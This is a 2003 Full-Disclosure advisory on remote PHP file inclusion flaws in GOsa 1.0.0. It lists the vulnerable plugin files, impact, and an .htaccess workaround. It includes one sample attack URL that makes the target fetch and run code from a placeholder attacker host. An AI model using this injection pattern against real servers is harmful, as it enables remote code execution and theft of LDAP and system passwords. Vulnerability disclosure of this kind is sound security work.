-----BEGIN PGP SIGNED MESSAGE----- I. BACKGROUND The GOnicus System Administrator is a PHP based administration tool for managing accounts/systems in LDAP databases. Project homepage : http://www.gonicus.de II. DESCRIPTION A remote attacker can inject into GOsa arbitrary PHP code that executes under the privileges of the underlying web server. There are serveral places, where by modifying several variables attacker could execute arbitrary PHP code. By setting plugin variable in following files attacker could include remote files and execute them as a PHP code : plugins/3fax/1blocklists/index.php plugins/2administration/6departamentadmin/index.php plugins/2administration/5terminals/index.php plugins/2administration/4mailinglists/index.php plugins/2administration/3departaments/index.php plugins/2administration/2groupd/index.php The same situation exists in include/help.php where we could set base variable as a remote host and include remote file. The following is a sample attack URL that would cause "target.server" to load include/common.inc from "attackers.server". http://target.server/include/help.php?base=http://attackers.server/ GOsa doesnt' support "register_globals off". III. ANALYSIS Remote exploitation allows an attacker to execute arbitrary commands and code under the privileges of the web server. This also opens the door to privilege escalation attacks. Attacker could also debug httpd child processes and grab secret information like users system passwords, LDAP passwords. IV. DETECTION GOsa version 1.0.0 ( current ) is confirmed vulnerable. V. Workaround Temporary solution is to enable apache .htaccess authentication in all subdirectories containing .php files, which are included, not accessed directly. Example .htaccess file AuthType Basic AuthName koza UserAuthFile /dev/null require valid-user - -- Karol Więsek [appelast-at-bsquad.sm.pl] http://bsquad.sm.pl/ "Knajpa: miejsce, dokąd się co wieczór chodzi po raz ostatni w życiu." -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 Comment: Bear Software, LLC, http://bear-software.freeservers.com iQCVAwUBPlksdkKKOIVhErCVAQEeaAP+PBSWgy6Dealk+B3nNEmTQnsOzgUUuDd+ KNAapeZmyyzmsHR+BmCAiKLICtau+3OivQbRyhuIjh/I1oXrmFRDSdZVEWaau6c4 peTHhoHaTEbOpn4Wuc0D1axJhaeCboc1syOY3sss/U8cd+jEz7wQgBvWRcbmR02H VhwGjAjsVm8= =TYVx -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Sun Feb 23 2003 - 13:31:47 PST